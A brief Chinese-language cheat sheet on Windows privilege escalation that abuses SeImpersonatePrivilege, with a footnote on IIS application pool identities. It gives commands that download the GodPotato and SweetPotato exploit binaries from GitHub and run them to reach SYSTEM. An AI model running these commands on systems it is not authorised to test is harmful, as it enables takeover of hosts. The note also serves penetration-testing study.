SeImpersonatePrivilege

Windows Privilege Escalation: SeImpersonatePrivilege
在Windows中,SeImpersonatePrivilege 权限允许持有该权限的账户在经过身份验证后模拟其他⽤户。这种权限通常授予服务账户,如IIS的 iisapppool[1]⽤户。攻击者可以利⽤这个权限,通过特定的漏洞或⼯具,提升⾃⼰的权限,从低权限账户提升到SYSTEM级别

1. 利用

whoami /priv #检测

可以使用 GodPotato 或者 SweetPotato 进行提权

#GodPotato 
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe
GodPotato -cmd "cmd /c whoami"

#SweetPotato
wget https://raw.githubusercontent.com/uknowsec/SweetPotato/master/SweetPotato-Webshell-new/bin/Release/SweetPotato.exe
SweetPotato.exe -a whoami

  1. IIS APPPOOL 是 Windows Internet Information Services (IIS) 中的应用程序池(Application Pool)的用户标识。
    在 Windows 系统中,IIS 使用应用程序池来隔离不同的 Web应用程序。每个应用程序池都有一个关联的标识(identity),用于运行该池中的工作进程。
    常见的 IIS APPPOOL 用户:

    • IIS APPPOOL\DefaultAppPool - 默认应用程序池的用户
    • IIS APPPOOL{AppPoolName} - 特定应用程序池的用户
    ↩︎